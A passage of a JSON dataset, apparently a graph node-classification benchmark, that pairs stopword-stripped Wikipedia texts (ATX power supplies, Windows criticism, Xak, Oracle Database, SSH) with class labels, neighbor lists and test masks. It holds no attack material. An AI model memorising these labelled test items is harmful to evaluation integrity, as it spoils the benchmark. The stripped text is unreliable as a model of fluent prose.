requirement allows compatibility processors draw little power startup absolute over-current limit 240 va per rail removed allowing 12 v lines provide 20 per rail revision became effective february 2008 added maximum allowed ripple/noise specification 400 millivolts pwr_on pwr_ok signals requires dc power must hold 1 millisecond pwr_ok signal drops clarified country-specific input line harmonic content electromagnetic compatibility requirements added section climate savers updated recommended power supply configuration charts updated cross-regulation graphs unofficial name given later revisions v2.31 spec current version atx12v spec published april 2013 specified revision 1.31 'design guide desktop platform form factors names atx12v version 2.4 sfx merely design small form factor sff power supply casing power specifications almost identical atx thus sfx power supply mostly pin-compatible atx power supply main difference reduced dimensions electrical difference sfx specifications require −5 v rail since −5 v required isa-bus expansion cards issue modern hardware decreases productions costs result atx pin 20 carried −5 v absent current power supplies optional atx atx12v version 1.2 deleted atx version 1.3 sfx dimensions 125 × 63.5 × 100 mm width × height × depth 60 mm fan compared standard atx dimensions 150 × 86 × 140 mm optional 80 40 mm fan replacement increases decreases height sfx unit manufacturers retailers incorrectly market sfx power supplies µatx microatx power supplies besides manufacturers make sfx-l dimensions 125 × 63.5 × 130 mm accommodate 120 mm fan thin form factor another small power supply design standard atx specification connectors generally dimensioned w × h × 85 × 64 × 175 mm 3.34 × 2.52 × 6.89 provides wtx style motherboard connector incompatible standard atx motherboard connector atx12v power supply derivative made amd power athlon mp dual processor platform used high-end athlon mp motherboards special 8-pin supplemental connector motherboard amd ges psu required motherboards motherboards work atx 12 v psus a. atx12v-ges 24-pin p1 motherboard connector pinout motherboard connector follows viewing motherboard b. atx12v-ges 8-pin p2 motherboard connector pinout motherboard connector follows viewing motherboard eps12v defined server system infrastructure ssi used primarily smp/multi-core systems core 2 core i7 opteron xeon 24-pin atx motherboard connector atx12v v2.x 8-pin secondary connector optional 4-pin tertiary connector rather include extra cable many power supply makers implement 8-pin connector two combinable 4-pin connectors ensure backwards compatibility atx12v motherboards high-performance video card power demands dramatically increased 2000s high-end graphics cards power demands exceed agp pcie slot capabilities cards supplementary power delivered standard 4-pin peripheral floppy power connector midrange high-end pcie graphics cards manufactured 2004 typically use standard 6 8-pin pcie power connector directly psu although atx power supply specifications mostly vertically compatible ways electrically physically potential issues mixing old motherboards/systems new psus vice versa main issues consider following practical guidance mix mix proprietary brand-name systems require matching proprietary power supply may also support standard interchangeable power supplies efficiency power supplies means extent power wasted converting electricity household supply regulated dc computer power supplies vary around 70 90 efficiency various initiatives exist improve efficiency computer power supplies climate savers computing initiative promotes energy saving reduction greenhouse gas emissions encouraging development use efficient power supplies 80 plus certifies variety efficiency levels power supplies encourages use via financial incentives efficient power supplies also save money wasting less power result use less electricity power computer emit less waste heat results significant energy savings central air conditioning summer gains using efficient power supply substantial computers use lot power although power supply larger needed power rating extra margin safety overloading unit often less efficient wastes electricity lower loads appropriately sized unit example 900-watt power supply 80 plus silver efficiency rating means power supply designed least 85-percent efficient loads 180 w may 73 efficient load lower 100 w typical idle power desktop computer thus 100 w load losses supply would 37 w power supply put 450 w load supply efficiency peaks 89 loss would 56 w despite supplying 4.5 times useful power comparison 500-watt power supply carrying 80 plus bronze efficiency rating means power supply designed least 82-percent efficient loads 100 w may provide 84-percent efficiency 100 w load wasting 19 w",
    "neighbors": [
      1400,
      780,
      8730,
      1309,
      799,
      3883,
      4270,
      7983,
      8625,
      6322,
      8627,
      2500,
      455,
      7113,
      9307,
      10715,
      3037,
      9057,
      11623,
      8301,
      7151,
      10095,
      2161,
      6129,
      2803,
      5368
    ],
    "mask": "Test"
  },
  {
    "node_id": 10338,
    "label": 2,
    "text": "Criticism_of_Microsoft_Windows:criticism microsoft windows various versions microsoft desktop operating system windows received many criticisms since microsoft inception 2010 google engineer tavis ormandy criticized microsoft taking long patch fix reported security vulnerability windows virtual dos machine vdm patched 7 months mr. ormandy reported microsoft 2004 marc maiffret chief hacking officer security research firm eeye digital security criticized microsoft providing security patch windows asn.1 implementation 200 days right release windows vista computer scientist peter gutmann criticised digital rights management drm included microsoft windows allow content providers place restrictions certain types multimedia playback collected criticism write-up released stated analysis drew responses microsoft microsoft states criticized drm features already present windows xp thus new problem customers problematic features would activated required content played responses came george ou zdnet ed bott zdnet ed bott also published three-part rebuttal peter gutmann claims details number factual errors analysis criticizes gutmann reliance questionable sources personal blog postings friends anecdotal evidence google searches analysis paper gutmann never tested theories windows 7 allegations also made draconian drm spurred debate criticism website slashdot claims overreaching vista drm independent tech writers quickly dismissed claims faulty analysis actual problem spurred criticism turned unrelated problem experienced single user tried circumvent adobe creative suite copy protection mechanisms changing files failed work user concluded draconian drm windows windows criticized internet explorer web browser integrated windows shell windows 98 onwards previously internet explorer shipped separate application one problem since explorer easily replaced product another vendor undermines consumer choice issue precipitated concerns microsoft engages monopolistic practices resulted united states v. microsoft corp. court case eventually settled court another issue integration security vulnerabilities internet explorer also create security vulnerabilities windows could allow attacker exploit windows remote code execution january 2009 european commission started investigate microsoft bundling internet explorer windows commission stated microsoft tying internet explorer windows operating system harms competition web browsers undermines product innovation ultimately reduces consumer choice european commission microsoft eventually agreed microsoft would include web browser choice selection screen windows users european economic area means browserchoice.eu google microsoft competitor criticized windows becoming slower less reliable long term use adrian kingsley-hughes writing zdnet believes slow-down time due loading much software loading duplicate software installing much free/trial/beta software using old outdated incorrect drivers installing new drivers without uninstalling old ones may also due malware spyware 1999 andrew fernandez chief scientist cryptonym morrisville north carolina found cryptographic public key stored variable _key second key labeled nsakey discovery lead flurry speculation conspiracy theories second key could owned united states national security agency nsa could allow intelligence agency subvert windows user security also researcher dr. nicko van someren discovered cryptographic keys third key codice_1 file time existed windows 2000 release concerns raised cpus encrypted instruction sets existed time would made impossible discover cryptographic keys microsoft denied allegations — microsoft attributes naming key due technical review nsa pointing backup key required conform regulations evidence name key ever presented key enabled backdoor cryptographer computer security specialist bruce schneier also argued conspiracy theory pointing nsa wanted back door windows microsoft consent would need cryptographic key cryptographic keys included versions windows windows 95 osr2 onwards concerns shown advocates critics windows 10 privacy policies collection use customer data default express settings windows 10 configured send various information microsoft parties including collection user contacts calendar data associated input data personalize speech typing inking input typing inking data improve recognition allow apps use unique advertising id analytics advertising personalization functionality introduced windows 8.1 allow apps request user location data send data microsoft trusted partners improve location detection windows 8 similar settings except location data collection include trusted partners users opt data collection telemetry data error reporting usage also sent microsoft disabled non-enterprise versions windows 10 use cortana intelligent personal assistant also requires collection data device location data calendar apps use data emails text messages call contacts often interact device ” personalize functionality rock paper shotgun writer alec meer argued microsoft intent data collection lacked transparency stating world 45 pages policy documents opt-out settings split across 13 different settings screens external website constitutes 'real transparency extremetech pointed whilst previously campaigning google similar data collection strategies microsoft hoovers data ways would make google jealous however also pointed requirement vast usage customer data become norm citing increased reliance cloud computing forms external processing well similar data collection requirements services mobile devices google siri august 2015 russian politician nikolai levichev called windows 10 banned use russian government sends user data servers united states federal law requiring online services store data russian users servers within country blocked taken effect september 2016 following release 10 allegations also surfaced microsoft backported operating system increased data collection windows 7 windows 8 via recommended patches added additional telemetry features updates addition diagnostics tracking service connected specifically microsoft existing customer experience improvement program opt-in program sends additional diagnostic information microsoft addressing issues application insights service third-party software data collection functionality capable transmitting personal information browsing history contents emails chat video calls voice mail photos documents personal files keystrokes microsoft analysis accordance end user license agreement terms services agreement microsoft updated state following",
    "neighbors": [
      6150,
      11283,
      3605,
      5666,
      11301,
      6697,
      1581,
      7215,
      5682,
      8757,
      582,
      1098,
      9812,
      8798,
      4704,
      4194,
      10338,
      8296,
      617,
      5225,
      107,
      8299,
      7796,
      6265,
      8315,
      636,
      639,
      641,
      651,
      6797,
      10896,
      2196,
      10900,
      3224,
      10392,
      7838,
      6827,
      3250,
      9910,
      7359,
      4289,
      194,
      10957,
      7887,
      4816,
      3289,
      4316,
      740,
      9448,
      10989,
      1776,
      259,
      4356,
      11524,
      4360,
      782,
      8976,
      3857,
      11030,
      11549,
      7456,
      7970,
      1315,
      3875,
      11559,
      1832,
      6441,
      7983,
      3890,
      11060,
      9525,
      6462,
      321,
      9033,
      6476,
      11605,
      2391,
      4439,
      7515,
      11103,
      2919,
      9585,
      1916,
      8576,
      3463,
      1935,
      8080,
      4505,
      929,
      4515,
      3496,
      7615,
      7106,
      3527,
      4051,
      9173,
      11221,
      5600,
      8681,
      4074,
      5103,
      4081
    ],
    "mask": "None"
  },
  {
    "node_id": 10339,
    "label": 3,
    "text": "Xak:_The_Art_of_Visual_Stage:xak art visual stage xak art visual stage features typical high fantasy setting according game world legends great war fought benevolent weakening ancient gods demon race led collapse eventual mortality gods 'war sealing gods divided world three parts xak world humans oceanity world faeries xexis world demons demon world xexis tightly sealed two worlds prevent reentry warmongering demon race demons left behind xak however others managed discover separate means enter xak xexis anyway ancient history displayed introduction one badu powerful demon able use coercive magic make humans bidding duel god war managed defeat badu seal away mountain ice 250 years god later settled village known fearless live rest mortal life beginning game badu prison broken demons overrun parts xak order stop ravaging lands king wavis sends messenger faerie dork kart famous warrior living village fearless dork however gone missing player takes role latok kart dork 16-year-old son meets messenger faerie pixie latok embarks king quest slay badu hoping find father along way travels latok guided duel spirit course game turns dork thus latok descendant duel latok playable character game notable non-player characters latok meets include initial versions xak art visual stage released nec pc-8801 pc-9801 systems june 1989 followed graphically distinct releases msx2 november 1989 sharp x68000 april 1990 1992 game released pc engine along sequel one-disc compilation xak ii ported riot game features animated cut scenes requires super system card update played pc engine original cd-rom add-on another console port published sunsoft super famicom february 1993 latest visually enhanced remake developed japanese mobile phones became available vodafone live june 1 2004 game first release bandai rpg empire line role-playing games 2001–2008 pc-8801 msx2 x68000 pc-9801 versions art visual stage made downloadable microsoft windows d4 enterprise project egg online service first official english translation game also released dutch msx games distributor woomb.net early 2007 although website shut 2008 content transferred english counterpart project egg musical score xak art visual stage composed ryuji sasai tadahiro nitta marking first collaboration two musicians game soundtrack comprises 42 tracks released may 5 1989 title sounds xak art visual stage 2007 2008 music game pc-8801 msx2 x68000 versions added catalog d4 enterprise video game music service egg music site offers psg fm variation msx2 tracks use fm sound source extensive music x68000 game praised storyline music xak art visual stage referred micro cabin breakthrough title website famitsū magazine described game ’ story magnificent jayson napolitano original sound version stated music great stuff fans distinct sound late 80s audio art visual stage regarded higher quality games time also noted use visual representation system gave impression depth three-dimensionality",
    "neighbors": [
      8355,
      10534,
      6797,
      9006,
      145,
      10931,
      4181,
      6011
    ],
    "mask": "None"
  },
  {
    "node_id": 10340,
    "label": 1,
    "text": "Oracle_Database:oracle database oracle database commonly referred oracle rdbms simply oracle proprietary multi-model database management system produced marketed oracle corporation database commonly used running online transaction processing oltp data warehousing dw mixed oltp dw database workloads latest generation oracle database 19c available on-prem on-cloud hybrid-cloud environment 19c may also deployed oracle engineered systems e.g exadata on-prem oracle public cloud private cloud customer openworld 2017 san francisco executive chairman board cto larry ellison announced next database generation oracle autonomous database larry ellison two friends former co-workers bob miner ed oates started consultancy called software development laboratories sdl 1977 sdl developed original version oracle software name oracle comes code-name cia-funded project ellison worked formerly employed ampex oracle products follow custom release-numbering -naming convention c current release oracle database 19c stands cloud previous releases e.g oracle database 10g oracle9i database used suffixes g stand grid internet respectively prior release oracle8i database suffixes featured oracle database naming conventions note v1 oracle database larry ellison knew one would want buy version 1 oracle rdbms release numbering used following codes oracle database administrators guide includes brief history key innovations introduced major release oracle database oracle corporation releases critical patch updates cpus security patch updates spus security alerts close security holes could used data theft critical patch updates cpus security alerts come quarterly tuesday closest 17th day month oracle database may licensed deployed on-premises choice platforms including oracle engineered systems on-cloud choice services running general purpose hardware exadata various editions cloud services provide different levels database functionality different use cases e.g dev/test departmental non-critical apps mission-critical workloads different levels performance availability etc service levels oracle corporation provides range database cloud services oracle cloud platform designed different database use cases test/dev deployments small medium sized workloads large mission-critical workloads oracle database cloud services available choice general purpose hardware exadata engineered systems either virtual machines environments 'bare metal infrastructure known oracle cloud infrastructure latest oracle database version 12.2.0.1 comes three editions on-premises deployments oracle corporation also makes following edition available including oracle database 12c release 12.1.0.1 oracle also offered following oracle corporation discontinued se se1 12.1.0.2 release stopped offering new licenses editions december 1 2015 oracle database 12 c supported following os architecture combinations 2008 oracle corporation announced availability oracle exadata database machine v1 first generation engineered systems specifically designed oracle database workloads 2011 oracle corporation announced availability oracle database appliance pre-built pre-tuned highly available clustered database server built using two sunfire x86 servers direct attached storage oracle enterprise edition databases running certain oracle-supplied hardware use hybrid columnar compression efficient storage oracle database offers wide range options features areas availability scalability analytics performance security management developers integration aim enhance complement existing database functionality meet customer-specific requirements database options available enterprise edition offered extra cost exception two rules oracle real application clusters option comes included oracle database 12 c standard edition 2 additional cost availability scalability analytics performance security management developers integration apart clearly defined database options oracle databases may include many semi-autonomous software sub-systems oracle corporation sometimes refers features sense subtly different normal use word example oracle data guard counts officially feature command-stack within sql*plus though usability feature appear list features oracle list features may include example oracle database provides long list supported data models used managed inside oracle database oracle corporation classifies utilities bundled software supporting data transfer data maintenance database administration utilities included oracle database distributions include oracle corporation started drive toward wizard -driven environments view enabling non-programmers produce simple data-driven applications popular application development tool ships oracle database oracle application express apex browser-based tool allows developers build responsive database-driven applications leveraging sql pl/sql skills oracle sql developer free graphical tool database development allows developers browse database objects run sql statements sql scripts edit debug pl/sql statements incorporates standard customized reporting oracle rest data services ords function java ee-based alternative oracle http server providing rest-based interface relational data users also develop applications java pl/sql optionally using tools database upgrade assistant dbua provides gui upgrading oracle database jaccelerator ncomp – native-compilation java accelerator integrates hardware-optimized java code oracle 10g database oracle opatch provides patch management oracle databases sqltxplain tool sqlt offers tuning assistance oracle sql queries oracle database accessed many programming languages environments include java based languages like scala use jdbc access oracle database pl/sql routines within oracle databases access external routines registered operating-system shared libraries dbms_scheduler package invoke external scripts operating-system level pl/sql users oracle support contracts use oracle oracle support mos web site – known metalink re-branding exercise completed october 2010 support site provides users oracle corporation products repository reported problems diagnostic scripts solutions also integrates provision support tools patches upgrades remote diagnostic agent rda operate command-line diagnostic tool executing script data captured provides overview oracle database environment intended diagnostic trouble-shooting within rda hcve health check validation engine verify isolate host system environmental issues may affect performance oracle software oracle corporation also endorses certain practices conventions enhancing use database products include oracle certification program professional certification program includes administration oracle databases one main certification paths contains three levels large number user groups oracle database administrators developers users established geographical/region industry product basis including oracle user group communities also host regular events customers/users share experiences knowledge 2016 oracle holds 1 rdbms market share worldwide based revenue share ahead four closest competitors – microsoft ibm sap teradata market relational databases oracle database competes commercial products ibm db2 udb microsoft sql server oracle ibm tend battle mid-range database market unix linux platforms microsoft dominates mid-range database market microsoft windows platforms however since share many customers oracle ibm tend support products many middleware application categories example websphere peoplesoft siebel systems crm ibm hardware divisions work closely oracle performance-optimizing server-technologies example linux z systems niche commercial competitors include teradata data warehousing business intelligence software ag adabas sybase ibm informix among many others increasingly oracle database products compete open-source software relational database systems postgresql mongodb couchbase oracle acquired innobase supplier innodb codebase mysql part compete better open source alternatives acquired sun microsystems owner mysql 2010 database products licensed open source legal terms open source definition free distribute free royalty licensing fees oracle database system—identified alphanumeric system identifier sid—comprises least one instance application along data storage instance—identified persistently instantiation number activation id sys.v_ database.activation —comprises set operating-system processes memory-structures interact storage typical processes include pmon process monitor smon system monitor oracle documentation refer active database instance shared memory realm users oracle databases refer server-side memory-structure sga system global area sga typically holds cache information data-buffers sql commands user information addition storage database consists online redo logs logs hold transactional history processes turn archive online redo logs archive logs offline redo logs provide basis data recovery physical-standby forms data replication using oracle data guard oracle rac real application clusters option uses multiple instances attached central storage array version 10 g grid computing introduced shared resources instance use cpu resources another node grid advantage oracle rac resources nodes used database node uses memory cpu information shared nodes interconnect—the virtual private network oracle dbms store execute stored procedures functions within pl/sql oracle corporation proprietary procedural extension sql object-oriented language java invoke code objects and/or provide programming structures writing oracle rdbms stores data logically form tablespaces physically form data files datafiles tablespaces contain various types memory segments data segments index segments etc segments turn comprise one extents extents comprise groups contiguous data blocks data blocks form basic units data storage dba impose maximum quotas storage per user within tablespace partitioning feature introduced oracle 8 allows partitioning tables based different set keys specific partitions added dropped help manage large data sets oracle database management tracks computer data storage help information stored codice_1 tablespace codice_1 tablespace contains data dictionary indexes clusters data dictionary consists special collection tables contains information user-objects database since version 8 oracle rdbms also supports locally managed tablespaces store space management information bitmaps headers rather codice_1 tablespace happens default dictionary-managed tablespaces version 10 g later introduced codice_4 tablespace contains tables formerly stored codice_1 tablespace along objects tools oem previously required tablespace disk files primarily represent one following structures physical level data files comprise one data blocks block size vary data files data files occupy pre-allocated space file system computer server use raw disk directly exist within asm logical volumes oracle database installations come default schema called codice_6 installation process sets sample tables user logs database username codice_7 password codice_8 name codice_6 schema originated bruce scott one first employees oracle software development laboratories cat named tiger oracle corporation de-emphasizes codice_6 schema uses features recent oracle releases examples supplied oracle corporation reference default hr oe schemas default schemas include oracle instance uses system global area sga—a shared-memory area—to store data control-information oracle instance allocates sga starts de-allocates shut-down time information sga consists following elements fixed size established instance startup every oracle database one physical datafiles contain database data data logical database structures tables indexes physically stored datafiles allocated database datafiles following characteristics data datafile read needed normal database operation stored memory cache oracle database example user wants access data table database requested information already memory cache database read appropriate datafiles stored memory modified new data necessarily written datafile immediately reduce amount disk access increase performance data pooled memory written appropriate datafiles start instance using enterprise manager sql*plus amount memory allocated sga displayed. link library cache stores shared sql caching parse tree execution plan every unique sql statement multiple applications issue sql statement application access shared sql area reduces amount memory needed reduces processing-time used parsing execution planning data dictionary comprises set tables views map structure database oracle databases store information logical physical structure database data dictionary contains information oracle instance frequently accesses data dictionary parse sql statements oracle operation depends ready access data dictionary—performance bottlenecks data dictionary affect oracle users database administrators must make sure data dictionary cache sufficient capacity cache data without enough memory data-dictionary cache users see severe performance degradation allocating sufficient memory shared pool data dictionary cache resides precludes particular performance problem program global area pga memory-area oracle instance contains data control-information oracle server-processes background process every server background process pga total pga elements called instance pga size content pga depends oracle-server options installed area consists following components dbas monitor pga usage via system view dynamic performance views also known fixed views within oracle database present information virtual tables x tables built basis database memory database users access v views named prefix synonyms obtain information database structures performance oracle rdbms typically relies group processes running simultaneously background interacting monitor expedite database operations typical operating environments might include – temporarily permanently – following individual processes shown along abbreviated nomenclature oracle database terminology distinguishes different computer-science terms describing end-users interact database session within instance session identifier – session id sid distinct oracle system-identifier sid may also associated spid operating-system process identifier oracle databases control simultaneous access data resources locks alternatively documented enqueues databases also use latches – low-level serialization mechanisms protect shared data structures system global area oracle locks fall three categories note course multiple releases oracle reduced number instances exclusive ddl lock required making changes schema objects non-blocking ddl added 11.2 non-blocking ddl added list 12.1 non-blocking ddl added list 12.2 non-blocking ddl added list 18.1 database administrators control many tunable variations oracle instance means values parameter file file ascii default form pfile normally name format codice_21 default binary equivalent server parameter file spfile dynamically reconfigurable extent defaults format codice_22 within sql-based environment views codice_23 codice_24 give access reading parameter values implementation oracle dbms kernel code depends c programming database administrators limited access oracle-internal c structures via v views underlying x tables layers modules kernel depending different releases may include following given inferred meaning scheduler dbms_scheduler package available oracle 10g onwards job subsystems dbms_job package permit automation predictable processing oracle resource manager aims allocate cpu resources users groups users resources become scarce oracle release 10.2 database resource manager operates enterprise edition oracle corporation stated product announcements manageability dbas improved oracle9i 10g lungu vătuiu 2008 assessed relative manageability performing common dba tasks measuring timings performed tests single pentium cpu 1.7 ghz 512 mb ram running windows server 2000 oracle9i 10g installation improved 36 day-to-day administration 63 backup recovery 63 performance diagnostics tuning 74 weighted total improvement 56 researchers concluded oracle10g represents giant step forward oracle9i making database easier use manage various file-system structures hold logs trace files record different aspects database activity configurable destinations records include oracle net services allow client remote applications access oracle databases via network sessions using various protocols oracle database software comes 63 language-versions including regional variations british english american english variations versions cover names days months abbreviations time-symbols a.m. a.d. sorting oracle corporation translated oracle database error-messages arabic catalan chinese czech danish dutch english finnish french german greek hebrew hungarian italian japanese korean norwegian polish portuguese romanian russian slovak spanish swedish thai turkish oracle corporation provides database developers tools mechanisms producing internationalized database applications referred internally globalization",
    "neighbors": [
      3,
      1539,
      8201,
      1035,
      1037,
      1549,
      10258,
      2068,
      1049,
      5658,
      9245,
      3103,
      9762,
      5669,
      2089,
      10793,
      5677,
      10286,
      9263,
      7218,
      3636,
      9782,
      10297,
      1594,
      5691,
      10302,
      9286,
      6219,
      10835,
      597,
      10326,
      7767,
      5210,
      2652,
      96,
      7776,
      3171,
      9828,
      2669,
      5749,
      1146,
      7802,
      10367,
      11392,
      9348,
      5768,
      9867,
      4236,
      6797,
      10389,
      5271,
      8863,
      8353,
      4263,
      8871,
      1707,
      4781,
      8878,
      10413,
      2737,
      9397,
      6338,
      5827,
      6850,
      6341,
      5833,
      4811,
      2768,
      7889,
      6359,
      7895,
      1755,
      2780,
      2269,
      734,
      10459,
      1250,
      10471,
      5356,
      6383,
      1776,
      8434,
      11506,
      7412,
      11507,
      7930,
      3323,
      11515,
      6403,
      9988,
      1801,
      8979,
      5910,
      5399,
      1304,
      1816,
      6424,
      5403,
      284,
      7446,
      10518,
      11030,
      6433,
      6434,
      2339,
      8994,
      7461,
      2344,
      9010,
      10546,
      9012,
      3894,
      823,
      8502,
      10553,
      10048,
      5953,
      5956,
      4423,
      4424,
      6480,
      2901,
      3414,
      11098,
      8539,
      863,
      7523,
      1383,
      362,
      8554,
      10090,
      2413,
      7022,
      3951,
      6003,
      9075,
      1399,
      3960,
      3450,
      3454,
      6015,
      2432,
      2944,
      10624,
      11136,
      8582,
      10632,
      5523,
      1943,
      2456,
      7576,
      10137,
      1435,
      9631,
      2465,
      9634,
      6051,
      9126,
      7080,
      11692,
      5549,
      1459,
      3507,
      11191,
      7608,
      9144,
      10681,
      3004,
      9665,
      11201,
      8644,
      5061,
      9166,
      5583,
      2512,
      3541,
      4053,
      9177,
      987,
      6107,
      477,
      479,
      4065,
      3042,
      7650,
      7654,
      6124,
      2544,
      10737,
      3573,
      8188,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10341,
    "label": 5,
    "text": "Secure_Shell:secure shell secure shell ssh cryptographic network protocol operating network services securely unsecured network typical applications include remote command-line login remote command execution network service secured ssh ssh provides secure channel unsecured network client–server architecture connecting ssh client application ssh server protocol specification distinguishes two major versions referred ssh-1 ssh-2 standard tcp port ssh 22 ssh generally used access unix-like operating systems also used microsoft windows windows 10 uses openssh default ssh client ssh designed replacement telnet unsecured remote shell protocols berkeley rlogin rsh rexec protocols protocols send information notably passwords plaintext rendering susceptible interception disclosure using packet analysis encryption used ssh intended provide confidentiality integrity data unsecured network internet although files leaked edward snowden indicate national security agency sometimes decrypt ssh allowing read contents ssh sessions ssh uses public-key cryptography authenticate remote computer allow authenticate user necessary several ways use ssh one use automatically generated public-private key pairs simply encrypt network connection use password authentication log another use manually generated public-private key pair perform authentication allowing users programs log without specify password scenario anyone produce matching pair different keys public private public key placed computers must allow access owner matching private key owner keeps private key secret authentication based private key key never transferred network authentication ssh verifies whether person offering public key also owns matching private key versions ssh important verify unknown public keys i.e associate public keys identities accepting valid accepting attacker public key without validation authorize unauthorized attacker valid user unix-like systems list authorized public keys typically stored home directory user allowed log remotely file ~/.ssh/authorized_keys file respected ssh writable anything apart owner root public key present remote end matching private key present local end typing password longer required software like message passing interface mpi stack may need password-less access run properly however additional security private key locked passphrase private key also looked standard places full path specified command line setting option -i ssh ssh-keygen utility produces public private keys always pairs ssh also supports password-based authentication encrypted automatically generated keys case attacker could imitate legitimate server side ask password obtain man-in-the-middle attack however possible two sides never authenticated ssh remembers key server side previously used ssh client raises warning accepting key new previously unknown server password authentication disabled ssh typically used log remote machine execute commands also supports tunneling forwarding tcp ports x11 connections transfer files using associated ssh file transfer sftp secure copy scp protocols ssh uses client-server model standard tcp port 22 assigned contacting ssh servers ssh client program typically used establishing connections ssh daemon accepting remote connections commonly present modern operating systems including macos distributions linux openbsd freebsd netbsd solaris openvms notably versions windows prior 1709 include ssh default proprietary freeware open source e.g putty version openssh part cygwin versions various levels complexity completeness exist file managers unix-like systems e.g konqueror use fish protocol provide split-pane gui drag-and-drop open source windows program winscp provides similar file management synchronization copy remote delete capability using putty back-end winscp putty available packaged run directly usb drive without requiring installation client machine setting ssh server windows typically involves enabling feature settings app windows 10 version 1709 official win32 port openssh available ssh important cloud computing solve connectivity problems avoiding security issues exposing cloud-based virtual machine directly internet ssh tunnel provide secure path internet firewall virtual machine 1995 tatu ylönen researcher helsinki university technology finland designed first version protocol called ssh-1 prompted password-sniffing attack university network goal ssh replace earlier rlogin telnet ftp rsh protocols provide strong authentication guarantee confidentiality ylönen released implementation freeware july 1995 tool quickly gained popularity towards end 1995 ssh user base grown 20,000 users fifty countries december 1995 ylönen founded ssh communications security market develop ssh original version ssh software used various pieces free software gnu libgmp later versions released ssh communications security evolved increasingly proprietary software estimated year 2000 number users grown 2 million secsh official internet engineering task force ietf name ietf working group responsible version 2 ssh protocol 2006 revised version protocol ssh-2 adopted standard version incompatible ssh-1 ssh-2 features security feature improvements ssh-1 better security example comes diffie–hellman key exchange strong integrity checking via message authentication codes new features ssh-2 include ability run number shell sessions single ssh connection due ssh-2 superiority popularity ssh-1 implementations libssh v0.8.0+ lsh dropbear support ssh-2 protocol january 2006 well version 2.1 established rfc 4253 specified ssh server supports 2.0 prior versions ssh identify protoversion 1.99 actual version method identify backward compatibility 1999 developers wanting free software version available went back older 1.2.12 release original ssh program last released open source license björn grönvall ossh subsequently developed codebase shortly thereafter openbsd developers forked grönvall code extensive work creating openssh shipped 2.6 release openbsd version portability branch formed port openssh operating systems openssh single popular ssh implementation coming default large number operating systems ossh meanwhile become obsolete openssh continues maintained supports ssh-2 protocol expunged ssh-1 support codebase openssh 7.6 release ssh protocol used many applications across many platforms including unix variants linux bsds including apple macos solaris well microsoft windows applications may require features available compatible specific ssh clients servers example using ssh protocol implement vpn possible presently openssh server client implementation secure shell protocols used several file transfer mechanisms ssh-2 protocol internal architecture defined rfc 4251 well-separated layers namely open architecture provides considerable flexibility allowing use ssh variety purposes beyond secure shell functionality transport layer alone comparable transport layer security tls user-authentication layer highly extensible custom authentication methods connection layer provides ability multiplex many secondary sessions single ssh connection feature comparable beep available tls intended performance enhancements ssh products 1998 vulnerability described ssh 1.5 allowed unauthorized insertion content encrypted ssh stream due insufficient data integrity protection crc-32 used version protocol fix known ssh compensation attack detector introduced implementations many updated implementations contained new integer overflow vulnerability allowed attackers execute arbitrary code privileges ssh daemon typically root january 2001 vulnerability discovered allows attackers modify last block idea-encrypted session month another vulnerability discovered allowed malicious server forward client authentication another server since ssh-1 inherent design flaws make vulnerable generally considered obsolete avoided explicitly disabling fallback ssh-1 modern servers clients support ssh-2 november 2008 theoretical vulnerability discovered versions ssh allowed recovery 32 bits plaintext block ciphertext encrypted using standard default encryption mode cbc straightforward solution use ctr counter mode instead cbc mode since renders ssh resistant attack december 28 2014 der spiegel published classified information leaked whistleblower edward snowden suggests national security agency may able decrypt ssh traffic technical details associated process disclosed analysis 2017 hacking tools bothanspy gyrfalcon suggested ssh protocol compromised following rfc publications ietf secsh working group document ssh-2 proposed internet standard later modified expanded following publications addition openssh project includes several vendor protocol specifications/extensions",
    "neighbors": [
      513,
      2050,
      6657,
      10242,
      517,
      1030,
      510,
      3592,
      521,
      6154,
      9223,
      10254,
      2064,
      3089,
      9744,
      8211,
      7188,
      11284,
      7702,
      3097,
      6681,
      6682,
      10269,
      10271,
      6689,
      9762,
      35,
      2083,
      2085,
      9251,
      10788,
      7208,
      3625,
      4649,
      3629,
      7214,
      8238,
      562,
      1586,
      2610,
      9269,
      4663,
      7736,
      11321,
      5179,
      3133,
      574,
      4158,
      5181,
      5694,
      9281,
      6723,
      3657,
      8265,
      4687,
      10831,
      11345,
      10329,
      8283,
      11357,
      2143,
      7264,
      4194,
      10851,
      2661,
      10344,
      9834,
      3695,
      4723,
      5749,
      2679,
      2169,
      4729,
      3707,
      6265,
      4224,
      5251,
      1157,
      3717,
      4229,
      5254,
      649,
      4746,
      8329,
      1164,
      6797,
      8331,
      9868,
      3218,
      1683,
      10387,
      9365,
      11413,
      152,
      1688,
      1692,
      10909,
      3742,
      161,
      4772,
      165,
      8358,
      3751,
      3752,
      9380,
      9381,
      172,
      10924,
      2222,
      6318,
      6319,
      7857,
      8368,
      9394,
      11442,
      9909,
      1208,
      4793,
      6330,
      1211,
      7865,
      4797,
      702,
      3777,
      8386,
      7364,
      2245,
      3781,
      9412,
      9924,
      8905,
      5322,
      5834,
      9930,
      1229,
      7887,
      3794,
      5843,
      8404,
      6363,
      3805,
      6877,
      7391,
      9437,
      1761,
      3297,
      3299,
      9440,
      10461,
      11492,
      2797,
      7406,
      751,
      8432,
      8946,
      11001,
      3322,
      5373,
      4863,
      5887,
      9987,
      3847,
      1288,
      9485,
      5397,
      10005,
      6935,
      2841,
      5402,
      5405,
      5408,
      10530,
      6436,
      3877,
      9511,
      10025,
      7983,
      7984,
      10032,
      11569,
      10035,
      823,
      6456,
      5433,
      2362,
      5435,
      8504,
      829,
      5437,
      6975,
      10747,
      10748,
      11584,
      2373,
      1862,
      2887,
      10058,
      5964,
      849,
      6993,
      4435,
      1876,
      2904,
      7003,
      4956,
      4957,
      5469,
      2399,
      5470,
      5471,
      5472,
      10589,
      871,
      11112,
      361,
      5482,
      7018,
      367,
      8047,
      11633,
      5492,
      891,
      6523,
      6524,
      1406,
      10109,
      11647,
      10115,
      7556,
      10631,
      904,
      1929,
      4490,
      6541,
      7570,
      4501,
      5531,
      9117,
      10141,
      9119,
      10144,
      2465,
      4001,
      419,
      10659,
      933,
      7078,
      2983,
      3495,
      5032,
      9640,
      11175,
      11693,
      8837,
      6064,
      6577,
      2996,
      8630,
      4024,
      8121,
      10171,
      11196,
      3006,
      8640,
      1989,
      9670,
      3018,
      2509,
      6098,
      1491,
      5590,
      474,
      9690,
      1501,
      5086,
      8669,
      1504,
      8670,
      3042,
      5603,
      7139,
      5093,
      7652,
      8674,
      10723,
      9193,
      9705,
      10727,
      3564,
      10732,
      5102,
      5107,
      501,
      1526,
      4085,
